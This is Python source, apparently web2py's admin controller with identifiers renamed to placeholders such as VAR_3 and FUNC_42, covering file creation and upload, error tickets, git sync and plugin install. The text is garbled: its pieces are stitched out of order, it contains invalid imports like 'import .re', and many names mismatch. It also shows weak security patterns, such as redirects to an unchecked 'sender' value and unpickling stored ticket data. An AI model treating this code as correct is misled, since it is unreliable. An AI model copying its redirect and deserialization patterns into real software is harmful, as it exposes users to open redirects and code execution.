VAR_82[VAR_156] = re.findall(REGEX_DEFINE_TABLE, VAR_2, re.MULTILINE)
VAR_82[VAR_156].sort()
controllers = sorted(
listdir(apath('%VAR_140/VAR_51/' % VAR_3, VAR_122=request), '.*\.py$'))
VAR_51 = [x.replace('\\', '/') for x in VAR_51]
VAR_83 = {}
for VAR_48 in VAR_51:
VAR_2 = FUNC_3(apath('%VAR_140/VAR_51/%s' % (VAR_3, VAR_48), VAR_122=request))
try:
VAR_95 = find_exposed_functions(VAR_2)
VAR_83[VAR_48] = VAR_95 and sorted(VAR_95) or []
except SyntaxError as err:
VAR_83[VAR_48] = ['SyntaxError:Line:%d' % err.lineno]
VAR_84 = sorted(
listdir(apath('%VAR_140/VAR_84/' % VAR_3, VAR_122=request), '[\w/\-]+(\.\w+)+$'))
VAR_84 = [x.replace('\\', '/') for x in VAR_84 if not x.endswith('.bak')]
VAR_85 = {}
VAR_86 = {}
for VAR_48 in VAR_84:
VAR_2 = FUNC_3(apath('%VAR_140/VAR_84/%s' % (VAR_3, VAR_48), VAR_122=request))
VAR_95 = re.findall(REGEX_EXTEND, VAR_2, re.MULTILINE)
if VAR_95:
VAR_85[VAR_48] = VAR_95[0][1]
VAR_95 = re.findall(REGEX_INCLUDE, VAR_2)
VAR_86[VAR_48] = [VAR_111[1] for VAR_111 in VAR_95]
modules = listdir(apath('%VAR_140/VAR_87/' % VAR_3, VAR_122=request), '.*\.py$')
VAR_87 = modules = [x.replace('\\', '/') for x in VAR_87]
modules.sort()
VAR_88 = listdir(apath('%VAR_140/private/' % VAR_3, VAR_122=request), '[^\.#].*')
VAR_88 = [x.replace('\\', '/') for x in VAR_88]
privates.sort()
VAR_89 = listdir(apath('%VAR_140/static/' % VAR_3, VAR_122=request), '[^\.#].*',
maxnum=VAR_1)
VAR_89 = [x.replace(os.path.sep, '/') for x in VAR_89]
statics.sort()
VAR_90 = os.path.join(apath(VAR_3, VAR_122=request), 'languages')
VAR_91 = dict([(VAR_188, info) for VAR_188, info
in iteritems(read_possible_languages(VAR_90))
if info[2] != 0]) # info[2] is langfile_mtime:
VAR_92 = apath('%VAR_140/cron' % VAR_3, VAR_122=request)
VAR_93 = apath('%VAR_140/cron/crontab' % VAR_3, VAR_122=request)
if not is_gae:
if not os.path.exists(VAR_92):
os.mkdir(VAR_92)
if not os.path.exists(VAR_93):
FUNC_4(VAR_93, '#crontab')
VAR_94 = []
def FUNC_62(VAR_95, VAR_94):
FUNC_56 += [VAR_70[7:].split('/')[0].split(
'.')[0] for VAR_70 in VAR_95 if VAR_70.startswith('plugin_')]
VAR_94[:] = list(set(VAR_94))
FUNC_56.sort()
return [VAR_70 for VAR_70 in VAR_95 if not VAR_70.startswith('plugin_')]
return dict(VAR_3=app,
VAR_81=FUNC_62(VAR_81, VAR_94),
VAR_82=defines,
VAR_51=FUNC_62(VAR_51, VAR_94),
VAR_83=functions,
VAR_84=FUNC_62(VAR_84, VAR_94),
VAR_87=FUNC_62(VAR_87, VAR_94),
VAR_85=extend,
VAR_86=include,
VAR_88=FUNC_62(VAR_88, VAR_94),
VAR_89=FUNC_62(VAR_89, VAR_94),
VAR_91=languages,
VAR_93=crontab,
VAR_94=FUNC_56)
def FUNC_35():
VAR_3 = request.args(0)
VAR_96 = request.args(1)
VAR_97 = 'plugin_' + VAR_96
VAR_46 = FORM.confirm(
T('Delete'),
{T('Cancel'): URL('design', VAR_98=VAR_3)})
if VAR_46.accepted:
try:
for VAR_168 in ['models', 'views', 'controllers', 'static', 'modules', 'private']:
VAR_15 = os.path.join(apath(VAR_3, VAR_122=request), VAR_168)
for VAR_70 in os.listdir(VAR_15):
if VAR_70.rsplit('.', 1)[0] == VAR_97:
VAR_5 = os.path.join(VAR_15, VAR_70)
if os.path.isdir(VAR_5):
shutil.rmtree(VAR_5)
else:
os.unlink(VAR_5)
session.flash = T('plugin "%(VAR_96)s" deleted',
dict(VAR_96=FUNC_36))
except Exception:
session.flash = T('unable to FUNC_21 VAR_16 VAR_96 "%(VAR_96)s"',
dict(VAR_96=FUNC_36))
redirect(URL('design', VAR_98=request.args(0), VAR_157=request.vars.id2))
return dict(VAR_46=dialog, VAR_96=FUNC_36)
def VAR_96():
VAR_3 = FUNC_5()
VAR_96 = request.args(1)
if not VAR_43.flash and VAR_3 == request.application:
VAR_155 = T('ATTENTION: you cannot FUNC_27 the running application!')
VAR_43.flash = VAR_155
if os.path.exists(apath('%VAR_140/compiled' % VAR_3, VAR_122=request)):
session.flash = \
T('application is compiled and cannot be designed')
redirect(URL('site'))
models = listdir(apath('%VAR_140/VAR_81/' % VAR_3, VAR_122=request), '.*\.py$')
VAR_81 = [x.replace('\\', '/') for x in VAR_81]
VAR_82 = {}
for VAR_156 in VAR_81:
VAR_2 = FUNC_3(apath('%VAR_140/VAR_81/%s' % (VAR_3, VAR_156), VAR_122=request))
VAR_82[VAR_156] = re.findall(REGEX_DEFINE_TABLE, VAR_2, re.MULTILINE)
VAR_82[VAR_156].sort()
controllers = sorted(
listdir(apath('%VAR_140/VAR_51/' % VAR_3, VAR_122=request), '.*\.py$'))
VAR_51 = [x.replace('\\', '/') for x in VAR_51]
VAR_83 = {}
for VAR_48 in VAR_51:
VAR_2 = FUNC_3(apath('%VAR_140/VAR_51/%s' % (VAR_3, VAR_48), VAR_122=request))
try:
VAR_95 = find_exposed_functions(VAR_2)
VAR_83[VAR_48] = VAR_95 and sorted(VAR_95) or []
except SyntaxError as err:
VAR_83[VAR_48] = ['SyntaxError:Line:%d' % err.lineno]
VAR_84 = sorted(
listdir(apath('%VAR_140/VAR_84/' % VAR_3, VAR_122=request), '[\w/\-]+\.\w+$'))
VAR_84 = [x.replace('\\', '/') for x in VAR_84]
VAR_85 = {}
VAR_86 = {}
for VAR_48 in VAR_84:
VAR_2 = FUNC_3(apath('%VAR_140/VAR_84/%s' % (VAR_3, VAR_48), VAR_122=request))
VAR_95 = re.findall(REGEX_EXTEND, VAR_2, re.MULTILINE)
if VAR_95:
VAR_85[VAR_48] = VAR_95[0][1]
VAR_95 = re.findall(REGEX_INCLUDE, VAR_2)
VAR_86[VAR_48] = [VAR_111[1] for VAR_111 in VAR_95]
modules = listdir(apath('%VAR_140/VAR_87/' % VAR_3, VAR_122=request), '.*\.py$')
VAR_87 = modules = [x.replace('\\', '/') for x in VAR_87]
modules.sort()
VAR_88 = listdir(apath('%VAR_140/private/' % VAR_3, VAR_122=request), '[^\.#].*')
VAR_88 = [x.replace('\\', '/') for x in VAR_88]
privates.sort()
VAR_89 = listdir(apath('%VAR_140/static/' % VAR_3, VAR_122=request), '[^\.#].*',
maxnum=VAR_1)
VAR_89 = [x.replace(os.path.sep, '/') for x in VAR_89]
statics.sort()
VAR_91 = sorted([VAR_188 + '.py' for VAR_188, info in
iteritems(T.get_possible_languages_info())
if info[2] != 0]) # info[2] is langfile_mtime:
crontab = apath('%VAR_140/cron/crontab' % VAR_3, VAR_122=request)
if not os.path.exists(VAR_93):
FUNC_4(VAR_93, '#crontab')
def FUNC_62(VAR_95):
VAR_32 = re.compile('^plugin_' + VAR_96 + '(/.*|\..*)?$')
return [VAR_70 for VAR_70 in VAR_95 if VAR_70 and VAR_32.match(VAR_70)]
return dict(VAR_3=app,
VAR_81=FUNC_62(VAR_81),
VAR_82=defines,
VAR_51=FUNC_62(VAR_51),
VAR_83=functions,
VAR_84=FUNC_62(VAR_84),
VAR_87=FUNC_62(VAR_87),
VAR_85=extend,
VAR_86=include,
VAR_88=FUNC_62(VAR_88),
VAR_89=FUNC_62(VAR_89),
VAR_91=languages,
VAR_93=crontab)
def FUNC_37():
if request.vars and not request.vars.token == session.token:
redirect(URL('logout'))
try:
VAR_157 = '#' + request.vars.id if request.vars.id else ''
if request.vars.app:
VAR_3 = FUNC_5(request.vars.app)
VAR_15 = abspath(request.vars.location)
else:
if request.vars.dir:
request.vars.location += request.vars.dir + '/'
VAR_3 = FUNC_5(VAR_10=request.vars.location.split('/')[0])
VAR_15 = apath(request.vars.location, VAR_122=request)
VAR_5 = re.sub('[^\w./-]+', '_', request.vars.filename)
if VAR_15[-7:] == '/rules/':
if len(VAR_5) == 0:
raise SyntaxError
if not VAR_5[-3:] == '.py':
VAR_5 += '.py'
VAR_188 = re.match('^plural_rules-(.*)\.py$', VAR_5).group(1)
VAR_189 = read_possible_languages(apath(VAR_3, VAR_122=request))[VAR_188]
VAR_112 = dedent("""
VAR_75=2 # for example, English language has 2 VAR_148:
get_plural_id = lambda VAR_173: int(VAR_173 != 1)
construct_plural_form = lambda word, plural_id: word
""")[1:] % dict(VAR_188=VAR_189[0], langname=VAR_189[1])
elif VAR_15[-11:] == '/VAR_91/':
if len(VAR_5) == 0:
raise SyntaxError
if not VAR_5[-3:] == '.py':
VAR_5 += '.py'
VAR_15 = os.path.join(apath(VAR_3, VAR_122=request), 'languages', VAR_5)
if not os.path.exists(VAR_15):
FUNC_4(VAR_15, '')
findT(apath(VAR_3, VAR_122=request), VAR_5[:-3])
session.flash = T('language VAR_16 "%(VAR_5)s" VAR_175/updated',
dict(VAR_5=filename))
redirect(request.vars.sender + VAR_157)
elif VAR_15[-8:] == '/VAR_81/':
if not VAR_5[-3:] == '.py':
VAR_5 += '.py'
if len(VAR_5) == 3:
raise SyntaxError
VAR_112 = '# -*- coding: utf-8 -*-\n'
elif VAR_15[-13:] == '/VAR_51/':
if not VAR_5[-3:] == '.py':
VAR_5 += '.py'
if len(VAR_5) == 3:
raise SyntaxError
VAR_112 = '# -*- coding: utf-8 -*-\VAR_173# %VAR_140\ndef VAR_197(): return dict(message="hello from %s")'
VAR_112 = text % (T('try something like'), VAR_5)
elif VAR_15[-7:] == '/VAR_84/':
if request.vars.plugin and not VAR_5.startswith('plugin_%VAR_140/' % request.vars.plugin):
VAR_5 = 'plugin_%VAR_140/%s' % (request.vars.plugin, VAR_5)
if VAR_5.find('.') < 0:
VAR_5 += '.html'
VAR_50 = VAR_5.split('.')[-1].lower()
if len(VAR_5) == 5:
raise SyntaxError
VAR_155 = T(
'This is the %(VAR_5)VAR_140 template', dict(VAR_5=filename))
if VAR_50 == 'html':
VAR_112 = dedent("""
{{VAR_85 'layout.html'}}
<h1>%VAR_140</h1>
{{=BEAUTIFY(VAR_43._vars)}}""" % VAR_155)[1:]
else:
VAR_222 = os.path.join(VAR_15, 'generic.' + VAR_50)
if os.path.exists(VAR_222):
VAR_112 = read_file(VAR_222)
else:
VAR_112 = ''
elif VAR_15[-9:] == '/VAR_87/':
if request.vars.plugin and not VAR_5.startswith('plugin_%VAR_140/' % request.vars.plugin):
VAR_5 = 'plugin_%VAR_140/%s' % (request.vars.plugin, VAR_5)
if not VAR_5[-3:] == '.py':
VAR_5 += '.py'
if len(VAR_5) == 3:
raise SyntaxError
VAR_112 = dedent("""
from gluon import *\n""")[1:]
elif (VAR_15[-8:] == '/static/') or (VAR_15[-9:] == '/private/'):
if (request.vars.plugin and
not VAR_5.startswith('plugin_%VAR_140/' % request.vars.plugin)):
VAR_5 = 'plugin_%VAR_140/%s' % (request.vars.plugin, VAR_5)
VAR_112 = ''
else:
redirect(request.vars.sender + VAR_157)
VAR_158 = os.path.join(VAR_15, VAR_5)
VAR_159 = os.path.dirname(VAR_158)
if not os.path.exists(VAR_159):
os.makedirs(VAR_159)
if os.path.exists(VAR_158):
raise SyntaxError
FUNC_4(VAR_158, VAR_112)
FUNC_1(VAR_3, 'CREATE', VAR_5)
if request.vars.dir:
VAR_110 = T('file "%(VAR_5)s" created',
dict(VAR_5=VAR_158[len(VAR_15):]))
else:
session.flash = T('file "%(VAR_5)s" created',
dict(VAR_5=VAR_158[len(VAR_15):]))
VAR_17 = {}
if request.vars.id:
VAR_17['id'] = request.vars.id
if request.vars.app:
VAR_17['app'] = request.vars.app
redirect(URL('edit',
VAR_98=[os.path.join(request.vars.location, VAR_5)], VAR_17=vars))
except Exception as VAR_114:
if not isinstance(VAR_114, HTTP):
session.flash = T('cannot create file')
if request.vars.dir:
VAR_43.flash = VAR_110
VAR_43.headers['web2py-VAR_126-content'] = 'append'
VAR_43.headers['web2py-VAR_126-command'] = "%VAR_140 %VAR_140 %s" % (
"$.web2py.invalidate('#files_menu');",
"load_file('%s');" % URL('edit', VAR_98=[VAR_3, request.vars.dir, VAR_5]),
"$.web2py.enableElement($('#VAR_26 form').find($.web2py.formInputClickSelector));")
return ''
else:
redirect(request.vars.sender + VAR_157)
def FUNC_38(VAR_3, VAR_13, VAR_14='.*\.py$'):
VAR_45 = sorted(
listdir(apath('%(VAR_3)VAR_140/%(VAR_13)VAR_140/' % {'app': VAR_3, 'dir': VAR_13}, VAR_122=request), VAR_14))
VAR_45 = [x.replace('\\', '/') for x in VAR_45 if not x.endswith('.bak')]
return VAR_45
def FUNC_39(VAR_15, VAR_16, VAR_17={}, VAR_3=None):
VAR_98 = (VAR_15, VAR_16) if 'app' in VAR_17 else (VAR_3, VAR_15, VAR_16)
VAR_99 = URL('edit', VAR_98=args, VAR_17=vars)
return A(VAR_16, VAR_144='editor_filelink', _href=VAR_99, _style='word-wrap: nowrap;')
def FUNC_40():
VAR_3 = request.vars.app or 'welcome'
VAR_65 = [{'name': 'models', 'reg': '.*\.py$'},
{'name': 'controllers', 'reg': '.*\.py$'},
{'name': 'views', 'reg': '[\w/\-]+(\.\w+)+$'},
{'name': 'modules', 'reg': '.*\.py$'},
{'name': 'static', 'reg': '[^\.#].*'},
{'name': 'private', 'reg': '.*\.py$'}]
VAR_100 = []
for VAR_13 in VAR_65:
VAR_100.append(TAG[''](LI(VAR_13['name'], VAR_144="nav-header component", _onclick="collapse('" + VAR_13['name'] + "_files');"),
LI(UL(*[LI(FUNC_39(VAR_13['name'], VAR_221, dict(id=VAR_13['name'] + VAR_221.replace('.', '__')), VAR_3), _style="overflow:hidden", _id=VAR_13['name'] + "__" + VAR_221.replace('.', '__'))
for VAR_221 in FUNC_38(VAR_3, VAR_13['name'], VAR_14=VAR_13['reg'])],
VAR_144="nav nav-list small-font"),
_id=VAR_13['name'] + '_files', _style="display: none;")))
return dict(VAR_100=result_files)
def FUNC_41():
if request.vars and not request.vars.token == session.token:
redirect(URL('logout'))
try:
VAR_5 = None
VAR_3 = FUNC_5(VAR_10=request.vars.location.split('/')[0])
VAR_15 = apath(request.vars.location, VAR_122=request)
if request.vars.filename:
VAR_5 = re.sub('[^\w\./]+', '_', request.vars.filename)
else:
VAR_5 = os.path.split(request.vars.file.filename)[-1]
if VAR_15[-8:] == '/VAR_81/' and not VAR_5[-3:] == '.py':
VAR_5 += '.py'
if VAR_15[-9:] == '/VAR_87/' and not VAR_5[-3:] == '.py':
VAR_5 += '.py'
if VAR_15[-13:] == '/VAR_51/' and not VAR_5[-3:] == '.py':
VAR_5 += '.py'
if VAR_15[-7:] == '/VAR_84/' and not VAR_5[-5:] == '.html':
VAR_5 += '.html'
if VAR_15[-11:] == '/VAR_91/' and not VAR_5[-3:] == '.py':
VAR_5 += '.py'
VAR_5 = os.path.join(VAR_15, VAR_5)
VAR_159 = os.path.dirname(VAR_5)
if not os.path.exists(VAR_159):
os.makedirs(VAR_159)
VAR_2 = request.vars.file.file.read()
VAR_160 = FUNC_0(VAR_2)
FUNC_4(VAR_5, VAR_2, 'wb')
FUNC_1(VAR_3, 'UPLOAD', VAR_5, VAR_160)
session.flash = T('file "%(VAR_5)s" uploaded',
dict(VAR_5=filename[len(VAR_15):]))
except Exception:
if VAR_5:
VAR_68 = dict(VAR_5=filename[len(VAR_15):])
else:
VAR_68 = dict(VAR_5='unknown')
session.flash = T('cannot upload VAR_16 "%(VAR_5)s"', VAR_68)
redirect(request.vars.sender)
def FUNC_42():
import operator
import os
import .hashlib
VAR_3 = FUNC_5()
if is_gae:
VAR_161 = 'dbold' if ('old' in
(request.args(1) or '')) else 'dbnew'
else:
VAR_161 = request.args(1) or 'new'
VAR_101 = {}
db_ready['status'] = FUNC_43(VAR_3)
VAR_101['errmessage'] = T(
"No ticket_storage.txt found under /private folder")
VAR_101['errlink'] = "http://web2py.com/books/default/chapter/29/13#Collecting-tickets"
if VAR_161 == 'new':
VAR_162 = apath('%VAR_140/errors' % VAR_3, VAR_122=request)
VAR_163 = []
for VAR_70 in request.vars:
if VAR_70[:7] == 'delete_':
VAR_163.append(VAR_70[7:])
VAR_164 = dict()
for fn in listdir(VAR_162, '^[VAR_7-fA-F0-9.\-]+$'):
VAR_190 = os.path.join(VAR_162, fn)
if not os.path.isfile(VAR_190):
continue
try:
VAR_205 = FUNC_2(VAR_190, 'rb')
try:
VAR_125 = pickle.load(VAR_205)
finally:
VAR_205.close()
except IOError:
continue
except EOFError:
continue
VAR_191 = hashlib.md5(to_bytes(VAR_125['traceback'])).hexdigest()
if VAR_191 in VAR_163:
os.unlink(VAR_190)
else:
try:
VAR_164[VAR_191]['count'] += 1
except KeyError:
VAR_218 = VAR_125['traceback'].split("\n")
VAR_219 = VAR_218[-2] if len(VAR_218) > 1 else 'unknown'
VAR_220 = os.path.split(VAR_125['layer'])[1]
VAR_164[VAR_191] = dict(count=1, pickel=VAR_125,
causer=VAR_220,
VAR_219=last_line,
VAR_191=hash, VAR_113=fn)
VAR_165 = [(x['count'], x) for x in VAR_164.values()]
VAR_165.sort(VAR_143=operator.itemgetter(0), reverse=True)
return dict(FUNC_42=[x[1] for x in VAR_165], VAR_3=VAR_3, VAR_161=method, VAR_101=db_ready)
elif VAR_161 == 'dbnew':
VAR_162 = apath('%VAR_140/errors' % VAR_3, VAR_122=request)
VAR_192, VAR_193 = FUNC_43(VAR_3)
VAR_163 = []
for VAR_70 in request.vars:
if VAR_70[:7] == 'delete_':
VAR_163.append(VAR_70[7:])
VAR_164 = dict()
for fn in VAR_192(VAR_193.id > 0).select():
try:
VAR_125 = pickle.loads(fn.ticket_data)
VAR_191 = hashlib.md5(VAR_125['traceback']).hexdigest()
if VAR_191 in VAR_163:
VAR_192(VAR_193.id == fn.id).delete()
VAR_192.commit()
else:
try:
VAR_164[VAR_191]['count'] += 1
except KeyError:
VAR_218 = VAR_125['traceback'].split("\n")
VAR_219 = VAR_218[-2]
VAR_220 = os.path.split(VAR_125['layer'])[1]
VAR_164[VAR_191] = dict(count=1,
pickel=VAR_125, causer=VAR_220,
VAR_219=last_line, VAR_191=hash,
VAR_113=fn.ticket_id)
except AttributeError as VAR_114:
VAR_192(VAR_193.id == fn.id).delete()
VAR_192.commit()
VAR_165 = [(x['count'], x) for x in VAR_164.values()]
VAR_165.sort(VAR_143=operator.itemgetter(0), reverse=True)
return dict(FUNC_42=[x[1] for x in VAR_165], VAR_3=app,
VAR_161=method, VAR_101=db_ready)
elif VAR_161 == 'dbold':
VAR_192, VAR_193 = FUNC_43(VAR_3)
for VAR_70 in request.vars:
if VAR_70[:7] == 'delete_':
VAR_192(VAR_193.ticket_id == VAR_70[7:]).delete()
VAR_192.commit()
VAR_206 = VAR_192(VAR_193.id > 0).select(VAR_193.ticket_id,
VAR_193.created_datetime,
orderby=~VAR_193.created_datetime)
VAR_207 = [row.ticket_id for row in VAR_206]
VAR_208 = dict([(row.ticket_id, row.created_datetime) for
row in VAR_206])
return dict(VAR_3=VAR_3, VAR_207=tickets, VAR_161=method,
VAR_208=times, VAR_101=db_ready)
else:
for VAR_70 in request.vars:
if VAR_70[:7] == 'delete_' and (not VAR_70 == "delete_all}"):
os.unlink(apath('%VAR_140/FUNC_42/%s' % (VAR_3, VAR_70[7:]), VAR_122=request))
VAR_209 = lambda p: os.stat(apath('%VAR_140/FUNC_42/%s' %
(VAR_3, p), VAR_122=request)).st_mtime
VAR_207 = sorted(
listdir(apath('%VAR_140/FUNC_42/' % VAR_3, VAR_122=request), '^\w.*'),
VAR_143=VAR_209,
reverse=True)
return dict(VAR_3=VAR_3, VAR_207=tickets, VAR_161=method, VAR_101=db_ready)
def FUNC_43(VAR_3):
VAR_102 = apath('%VAR_140/private' % VAR_3, VAR_122=request)
VAR_103 = os.path.join(VAR_102, 'ticket_storage.txt')
if os.path.exists(VAR_103):
VAR_166 = FUNC_3(VAR_103)
VAR_166 = db_string.strip().replace('\r', '').replace('\n', '')
elif is_gae:
VAR_166 = "google:datastore"
else:
return False
VAR_104 = 'web2py_ticket'
VAR_105 = VAR_104 + '_' + VAR_3
VAR_106 = apath('%VAR_140/databases' % VAR_3, VAR_122=request)
VAR_107 = DAL(VAR_166, VAR_168=VAR_106, auto_import=True)
if not VAR_107.get(VAR_105):
VAR_167 = VAR_107.define_table(
VAR_105,
Field('ticket_id', length=100),
Field('ticket_data', 'text'),
Field('created_datetime', 'datetime'),
)
return VAR_107, VAR_107.get(VAR_105)
def FUNC_44(VAR_15):
VAR_108 = VAR_15.replace('\\', '/')
if os.path.isabs(VAR_108) and os.path.isfile(VAR_108):
(VAR_168, VAR_5) = os.path.split(VAR_108)
(VAR_11, VAR_169) = os.path.splitext(VAR_5)
VAR_3 = FUNC_5()
VAR_170 = {'controllers': '.py', 'models': '.py', 'views': '.html'}
for VAR_143 in VAR_170.keys():
VAR_194 = VAR_168.endswith("%VAR_140/%s" % (VAR_3, VAR_143))
if VAR_169.lower() == VAR_170[VAR_143] and VAR_194:
return to_native(A('"' + VAR_108 + '"',
_href=URL(VAR_122=request,
VAR_221='edit/%VAR_140/%VAR_140/%s' % (VAR_3, VAR_143, VAR_5))).xml())
return ''
def FUNC_45(VAR_18):
VAR_109 = VAR_18.split('"')
VAR_110 = (len(VAR_109) != 0) and VAR_109[0] or ''
VAR_111 = 1
while VAR_111 < len(VAR_109):
VAR_171 = FUNC_44(VAR_109[VAR_111])
if VAR_171 == '':
VAR_110 += '"' + VAR_109[VAR_111]
else:
VAR_110 += VAR_171
if VAR_111 + 1 < len(VAR_109):
VAR_110 += VAR_109[VAR_111 + 1]
VAR_111 = VAR_111 + 1
VAR_111 = VAR_111 + 1
return VAR_110
class CLASS_0(object):
def __init__(self, VAR_112):
self.s = FUNC_45(CODE(VAR_112).xml())
def FUNC_63(self):
return self.s
def VAR_113():
if len(request.args) != 2:
session.flash = T('invalid ticket')
redirect(URL('site'))
VAR_3 = FUNC_5()
VAR_27 = request.env.web2py_version
VAR_113 = request.args[1]
VAR_114 = RestrictedError()
VAR_114.load(request, VAR_3, VAR_113)
return dict(VAR_3=app,
VAR_113=FUNC_46,
VAR_67=VAR_114.output,
VAR_18=(VAR_114.traceback and CLASS_0(VAR_114.traceback)),
snapshot=VAR_114.snapshot,
VAR_180=VAR_114.code,
layer=VAR_114.layer,
VAR_27=myversion)
def FUNC_47():
if len(request.args) != 2:
session.flash = T('invalid ticket')
redirect(URL('site'))
VAR_3 = FUNC_5()
VAR_27 = request.env.web2py_version
VAR_113 = request.args[1]
VAR_114 = RestrictedError()
request.tickets_db = FUNC_43(VAR_3)[0]
VAR_114.load(request, VAR_3, VAR_113)
VAR_43.view = 'default/VAR_113.html'
return dict(VAR_3=app,
VAR_113=FUNC_46,
VAR_67=VAR_114.output,
VAR_18=(VAR_114.traceback and CLASS_0(VAR_114.traceback)),
snapshot=VAR_114.snapshot,
VAR_180=VAR_114.code,
layer=VAR_114.layer,
VAR_27=myversion)
def VAR_125():
raise RuntimeError('admin VAR_113 generator at your service')
def FUNC_49():
VAR_3 = FUNC_5()
update_all_languages(apath(VAR_3, VAR_122=request))
session.flash = T('Language VAR_45 (static VAR_71) updated')
redirect(URL('design', VAR_98=VAR_3, VAR_157='languages'))
def FUNC_50():
if MULTI_USER_MODE:
if not db(db.auth_user).count():
auth.settings.registration_requires_approval = False
return dict(VAR_26=auth())
else:
return dict(VAR_26=T("Disabled"))
def FUNC_51():
gluon.rewrite.load()
redirect(URL('site'))
def FUNC_52():
if not (MULTI_USER_MODE and is_manager()):
session.flash = T('Not Authorized')
redirect(URL('site'))
db.auth_user.registration_key.writable = True
VAR_115 = SQLFORM.grid(db.auth_user)
return locals()
def FUNC_53():
if not (MULTI_USER_MODE and is_manager()):
session.flash = T('Not Authorized')
redirect(URL('site'))
VAR_26 = SQLFORM.factory(Field('emails', 'text'))
if VAR_26.process().accepted:
VAR_172 = [x.strip() for x in VAR_26.vars.emails.split('\n') if x.strip()]
VAR_173 = 0
for email in VAR_172:
if not db.auth_user(email=email):
VAR_173 += db.auth_user.insert(email=email) and 1 or 0
session.flash = T('%VAR_140 students registered', VAR_173)
redirect(URL('site'))
return locals()
def FUNC_54():
VAR_3 = FUNC_5()
if not VAR_19:
session.flash = VAR_117
redirect(URL('site'))
VAR_46 = FORM.confirm(T('Pull'),
{T('Cancel'): URL('site')})
if VAR_46.accepted:
try:
VAR_195 = git.Repo(os.path.join(apath(VAR_122=request), VAR_3))
VAR_196 = VAR_195.remotes.origin
VAR_196.fetch()
VAR_196.pull()
session.flash = T("Application updated via git pull")
redirect(URL('site'))
except git.CheckoutError:
session.flash = T("Pull failed, certain VAR_45 could not be checked VAR_39. Check logs for VAR_178.")
redirect(URL('site'))
except git.UnmergedEntriesError:
session.flash = T("Pull is not possible because you have unmerged VAR_45. Fix them up in the work tree, and then try again.")
redirect(URL('site'))
except git.GitCommandError:
session.flash = T(
"Pull failed, git exited abnormally. See logs for VAR_178.")
redirect(URL('site'))
except AssertionError:
session.flash = T("Pull is not possible because you have unmerged VAR_45. Fix them up in the work tree, and then try again.")
redirect(URL('site'))
elif 'cancel' in request.vars:
redirect(URL('site'))
return dict(VAR_3=VAR_3, VAR_46=dialog)
def FUNC_55():
VAR_3 = FUNC_5()
if not VAR_19:
session.flash = VAR_117
redirect(URL('site'))
VAR_26 = SQLFORM.factory(Field('changelog', requires=IS_NOT_EMPTY()))
VAR_26.element('input[type=submit]')['_value'] = T('Push')
VAR_26.add_button(T('Cancel'), URL('site'))
VAR_26.process()
if VAR_26.accepted:
try:
VAR_195 = git.Repo(os.path.join(apath(VAR_122=request), VAR_3))
VAR_197 = VAR_195.index
VAR_197.add([apath(VAR_122=request) + VAR_3 + '/*'])
VAR_198 = VAR_197.commit(VAR_26.vars.changelog)
VAR_196 = VAR_195.remotes.origin
VAR_196.push()
session.flash = T(
"Git VAR_195 updated with latest application changes.")
redirect(URL('site'))
except git.UnmergedEntriesError:
session.flash = T("Push failed, there are unmerged entries in the cache. Resolve merge issues manually and try again.")
redirect(URL('site'))
return dict(VAR_3=VAR_3, VAR_26=form)
def VAR_94():
VAR_3 = request.args(0)
from gluon.serializers import loads_json
if not session.plugins:
try:
VAR_199 = urlopen("http://www.web2pyslices.com/" +
"public/api.json/action/list/content/Package?package" +
"_type=VAR_96&search_index=false").read()
session.plugins = loads_json(VAR_199)
except:
VAR_43.flash = T('Unable to download the list of plugins')
session.plugins = []
return dict(VAR_94=session.plugins["results"], VAR_3=request.args(0))
def FUNC_57():
VAR_3 = request.args(0)
VAR_116 = request.vars.source
VAR_96 = request.vars.plugin
if not (VAR_116 and VAR_3):
raise HTTP(500, T("Invalid request"))
if not VAR_116.lower().split('://')[0] in ('http','https'):
raise HTTP(500, T("Invalid request"))
VAR_26 = SQLFORM.factory()
VAR_110 = None
if VAR_26.process().accepted:
if "web2py.plugin." in VAR_116:
VAR_5 = "web2py.plugin.%VAR_140.w2p" % \
VAR_116.split("web2py.plugin.")[-1].split(".w2p")[0]
else:
VAR_5 = "web2py.plugin.%VAR_140.w2p" % cleanpath(VAR_96)
if plugin_install(VAR_3, urlopen(VAR_116),
request, VAR_5):
session.flash = T('New VAR_96 VAR_212: %s', VAR_5)
else:
session.flash = \
T('unable to install VAR_96 "%s"', VAR_5)
redirect(URL(VAR_221="plugins", VAR_98=[VAR_3, ]))
return dict(VAR_26=form, VAR_3=VAR_3, VAR_96=FUNC_36, VAR_116=source)
|
VAR_0 = True
VAR_1 = 1000
if VAR_0:
if is_mobile:
VAR_43.view = VAR_43.view.replace('default/', 'default.mobile/')
VAR_43.menu = []
import .re
from gluon.admin import *
from gluon.fileutils import .abspath, read_file, write_file
from gluon.utils import web2py_uuid
from gluon.tools import Config, prevent_open_redirect
from gluon.compileapp import .find_exposed_functions
from glob import glob
from gluon._compat import .iteritems, PY2, pickle, xrange, urlopen, to_bytes, StringIO, to_native, reload
import gluon.rewrite
import .shutil
import platform
try:
import git
if git.__version__ < '0.3.1':
raise ImportError("Your VAR_25 of git is %VAR_140. Upgrade to 0.3.1 or better." % git.__version__)
VAR_19 = True
except ImportError as VAR_114:
VAR_19 = False
VAR_117 = 'Requires gitpython module, but not VAR_212 or incompatible VAR_25: %s' % VAR_114
from gluon.languages import (read_possible_languages, read_dict, write_dict,
read_plural_dict, write_plural_dict)
if DEMO_MODE and request.function in ['change_password', 'pack',
'pack_custom', 'pack_plugin', 'upgrade_web2py', 'uninstall',
'cleanup', 'compile_app', 'remove_compiled_app', 'delete',
'delete_plugin', 'create_file', 'upload_file', 'update_languages',
'reload_routes', 'git_push', 'git_pull', 'install_plugin']:
session.flash = T('disabled in demo mode')
redirect(URL('site'))
if is_gae and request.function in ('edit', 'edit_language',
'edit_plurals', 'update_languages', 'create_file', 'install_plugin'):
session.flash = T('disabled in GAE mode')
redirect(URL('site'))
if not is_manager() and request.function in ['change_password', 'upgrade_web2py']:
session.flash = T('disabled in multi FUNC_50 mode')
redirect(URL('site'))
if FILTER_APPS and request.args(0) and not request.args(0) in FILTER_APPS:
session.flash = T('disabled in demo mode')
redirect(URL('site'))
if not session.token:
session.token = web2py_uuid()
def FUNC_0(VAR_2):
return len([VAR_69 for VAR_69 in VAR_2.split('\n') if VAR_69.strip() and not VAR_69.startswith('#')])
def FUNC_1(VAR_3, VAR_4='EDIT', VAR_5=None, VAR_6=0):
VAR_20 = os.path.join(apath(VAR_3, VAR_122=request), 'progress.log')
VAR_21 = str(request.now)[:19]
if not os.path.exists(VAR_20):
FUNC_2(VAR_20, 'w').write('[%VAR_140] START\n' % VAR_21)
if VAR_5:
